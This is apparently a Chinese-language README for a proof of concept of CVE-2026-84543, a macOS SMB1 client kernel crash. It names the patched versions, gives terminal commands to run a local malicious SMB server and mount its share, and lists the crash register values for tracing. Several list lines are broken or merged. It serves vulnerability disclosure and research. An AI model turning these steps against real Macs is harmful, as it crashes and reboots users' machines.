此概念验证预计会导致受影响的 Mac 发生内核崩溃并重启。
研究中使用的受影响测试版本为 macOS Tahoe 26.4 (25E246) 和 macOS 26.5 beta 4 (25F5068a)。Apple 已在 macOS Golden Gate 27、Tahoe 26.7 和 Sequoia 15.8 中修复了 CVE-2026-84543。
smb1_unix_whoami_poc.py 是回环证据捕获服务器。它仅使用 Python 标准库,并且:
_COMM_PAGE_ASB_TARGET_KERN_VALUE;SMB_QFS_POSIX_WHOAMI(0x0202)响应,以创建不一致的计数/指针状态;以及0x020B)属性,用于崩溃寄存器溯源。在终端 A 中:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
记录打印出的 ASB_TARGET_KERN_VALUE;它在启动时随机化。
在终端 B 中:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
当 T 等于启动时打印的内核值金丝雀时:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
x8、x9 和 x11 中的特定位确立了溯源。观察到的关系在服务器响应字段与实时内核寄存器状态之间提供了逐字节的关联。